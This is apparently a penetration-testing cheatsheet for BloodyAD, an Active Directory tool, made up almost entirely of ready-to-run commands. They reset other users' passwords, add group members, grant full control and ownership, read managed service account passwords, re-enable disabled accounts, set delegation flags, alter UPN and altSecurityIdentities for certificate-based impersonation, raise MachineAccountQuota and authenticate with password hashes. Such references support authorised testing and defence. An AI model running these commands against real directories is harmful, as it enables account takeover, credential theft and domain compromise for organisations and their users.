BloodyAD

A cheatsheet for BloodyAD, a tool automating Active Directory tasks, including user management, password changes, and privilege escalation.

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username

bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword

bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE

bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION

bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn

Check if it has been modified

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr userPrincipalName

Enumerate MachineAccountQuota

bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota

Set MachineAccountQuota value to 10

bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10

bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local

bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'

bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail

To use Kerberos, obtain a TGT, export it, and then pass -k instead of providing a username and password
You can pass a user hash instead of a password using -p :hash